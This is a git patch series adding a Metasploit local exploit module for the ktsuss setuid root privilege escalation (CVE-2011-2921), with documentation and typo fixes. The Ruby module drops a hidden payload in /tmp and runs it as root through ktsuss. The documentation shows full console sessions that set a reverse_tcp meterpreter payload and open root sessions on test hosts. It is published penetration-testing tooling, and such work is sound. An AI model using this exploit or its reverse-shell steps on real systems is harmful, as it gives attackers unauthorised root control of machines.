From ca82e6cd2566eca3a7b9d27776532b77b6292ee8 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Mon, 19 Aug 2019 13:28:02 +0000 Subject: [PATCH 1/3] Add ktsuss suid Privilege Escalation module --- .../linux/local/ktsuss_suid_priv_esc.rb | 142 ++++++++++++++++++ 1 file changed, 142 insertions(+) create mode 100644 modules/exploits/linux/local/ktsuss_suid_priv_esc.rb diff --git a/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb b/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb new file mode 100644 index 0000000000..e13581d08d --- /dev/null +++ b/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb @@ -0,0 +1,142 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ktsuss suid Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges by exploiting + a vulnerability in ktsuss versions 1.4 and prior. + + The `ktsuss` executable is setuid `root` and does not drop + privileges prior to executing user specified commands, + resulting in command execution with `root` privileges. + + This module has been tested successfully on: + + ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and + ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'John Lightsey', # Discovery and exploit + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2011-08-13', + 'References' => + [ + ['CVE', '2011-2921'], + ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'], + ['URL', 'https://security.gentoo.org/glsa/201201-15'], + ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh'] + ], + 'Platform' => ['linux'], + 'Arch' => + [ + ARCH_X86, + ARCH_X64, + ARCH_ARMLE, + ARCH_AARCH64, + ARCH_PPC, + ARCH_MIPSLE, + ARCH_MIPSBE + ], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'DefaultOptions' => + { + 'AppendExit' => true, + 'PrependSetresuid' => true, + 'PrependSetresgid' => true, + 'PrependSetreuid' => true, + 'PrependSetuid' => true, + 'PrependFork' => true + }, + 'DefaultTarget' => 0)) + register_options [ + OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss']) + ] + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def ktsuss_path + datastore['KTSUSS_PATH'] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + chmod path + end + + def check + unless setuid? ktsuss_path + vprint_error "#{ktsuss_path} is not setuid" + return CheckCode::Safe + end + vprint_good "#{ktsuss_path} is setuid" + + id = cmd_exec 'whoami' + res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s + vprint_status res + + unless res.include? 'uid=0' + return CheckCode::Safe + end + + CheckCode::Vulnerable + end + + def exploit + unless check == CheckCode::Vulnerable + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + payload_name = ".#{rand_text_alphanumeric 10..15}" + payload_path = "#{base_dir}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + + print_status 'Executing payload ...' + id = cmd_exec 'whoami' + res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo " + vprint_line res + end +end From 9ce3365d56a07849e8880f2bcbf997dac718f07e Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Mon, 19 Aug 2019 13:34:52 +0000 Subject: [PATCH 2/3] Add documentation --- .../linux/local/ktsuss_suid_priv_esc.md | 124 ++++++++++++++++++ 1 file changed, 124 insertions(+) create mode 100644 documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md diff --git a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md new file mode 100644 index 0000000000..6fbda64963 --- /dev/null +++ b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md @@ -0,0 +1,124 @@ +## Description + + This module attempts to gain root privileges by exploiting + a vulnerability in ktsuss versions 1.4 and prior. + + The `ktsuss` executable is setuid `root` and does not drop + privileges prior to executing user specified commands, + resulting in command execution with `root` privileges. + + This module has been tested successfully on: + + +## Vulnerable Application + + This module has been tested successfully on: + + * ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64) + * ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64) + + +## Verification Steps + + 1. Start `msfconsole` + 2. Get a session + 3. `use exploit/linux/local/ktsuss_suid_priv_esc` + 4. `set SESSION [SESSION]` + 5. `check` + 6. `run` + 7. You should get a new *root* session + + +## Options + + **KTSUSS_PATH** + + Path to `ktsuss` executable (default: `/usr/bin/ktsuss`) + + **WritableDir** + + A writable directory file system path. (default: `/tmp`) + + +## Scenarios + +### ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64) + + ``` + msf5 > use exploit/linux/local/ktsuss_suid_priv_esc + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 + session => 1 + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true + verbose => true + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check + + [+] /usr/bin/ktsuss is setuid + [*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test) + [+] The target is vulnerable. + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + payload => linux/x64/meterpreter/reverse_tcp + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165 + lhost => 172.16.191.165 + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run + + [*] Started reverse TCP handler on 172.16.191.165:4444 + [+] /usr/bin/ktsuss is setuid + [*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test) + [*] Writing '/tmp/.lBanpIYpAJ60cwt' (389 bytes) ... + [*] Executing payload ... + [*] Transmitting intermediate stager...(126 bytes) + [*] Sending stage (3021284 bytes) to 172.16.191.137 + + [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.137:53060) at 2019-08-19 09:18:29 -0400 + + meterpreter > getuid + Server username: uid=0, gid=0, euid=0, egid=0 + meterpreter > sysinfo + Computer : 172.16.191.137 + OS : Sparky 5.8 (Linux 4.19.0-5-amd64) + Architecture : x64 + BuildTuple : x86_64-linux-musl + Meterpreter : x64/linux + meterpreter > + ``` + +### tsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64) + + ``` + msf5 > use exploit/linux/local/ktsuss_suid_priv_esc + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 + session => 1 + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true + verbose => true + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check + + [+] /usr/bin/ktsuss is setuid + [*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test) + [+] The target is vulnerable. + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + payload => linux/x64/meterpreter/reverse_tcp + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165 + lhost => 172.16.191.165 + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run + + [*] Started reverse TCP handler on 172.16.191.165:4444 + [+] /usr/bin/ktsuss is setuid + [*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test) + [*] Writing '/tmp/.R0aTPpB8aHk' (389 bytes) ... + [*] Executing payload ... + [*] Transmitting intermediate stager...(126 bytes) + [*] Sending stage (3021284 bytes) to 172.16.191.167 + + [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.167:44534) at 2019-08-19 09:25:48 -0400 + + meterpreter > getuid + Server username: uid=0, gid=0, euid=0, egid=0 + meterpreter > sysinfo + Computer : 172.16.191.167 + OS : Sparky 6 (Linux 4.19.0-5-amd64) + Architecture : x64 + BuildTuple : x86_64-linux-musl + Meterpreter : x64/linux + meterpreter > + ``` + From 4b9e7488828a8046dd4fc7ba352aaa6038c9efc7 Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 2 Sep 2019 13:31:30 -0400 Subject: [PATCH 3/3] ktsuss misc fixes --- .../modules/exploit/linux/local/ktsuss_suid_priv_esc.md | 4 +--- modules/exploits/linux/local/ktsuss_suid_priv_esc.rb | 4 ++-- 2 files changed, 3 insertions(+), 5 deletions(-) diff --git a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md index 6fbda64963..2ce5b01541 100644 --- a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md @@ -7,8 +7,6 @@ privileges prior to executing user specified commands, resulting in command execution with `root` privileges. - This module has been tested successfully on: - ## Vulnerable Application @@ -82,7 +80,7 @@ meterpreter > ``` -### tsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64) +### ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64) ``` msf5 > use exploit/linux/local/ktsuss_suid_priv_esc diff --git a/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb b/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb index e13581d08d..f854ee21d0 100644 --- a/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb +++ b/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb @@ -19,9 +19,9 @@ class MetasploitModule < Msf::Exploit::Local This module attempts to gain root privileges by exploiting a vulnerability in ktsuss versions 1.4 and prior. - The `ktsuss` executable is setuid `root` and does not drop + The ktsuss executable is setuid root and does not drop privileges prior to executing user specified commands, - resulting in command execution with `root` privileges. + resulting in command execution with root privileges. This module has been tested successfully on: